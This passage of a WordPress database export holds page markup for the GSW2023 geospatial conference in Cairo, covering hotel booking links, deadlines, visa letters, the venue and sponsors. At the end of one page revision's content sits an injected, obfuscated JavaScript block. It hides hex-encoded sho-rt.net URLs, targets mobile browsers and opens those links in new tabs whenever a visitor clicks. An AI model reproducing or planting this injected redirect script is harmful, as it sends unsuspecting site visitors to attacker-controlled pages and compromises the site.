link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-18 13:52:37','2023-06-18 13:52:37','',3066,'https://gsw2023.com/?p=4714',0,'revision','',0),
(4715,1,'2023-06-18 13:53:55','2023-06-18 13:53:55','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" 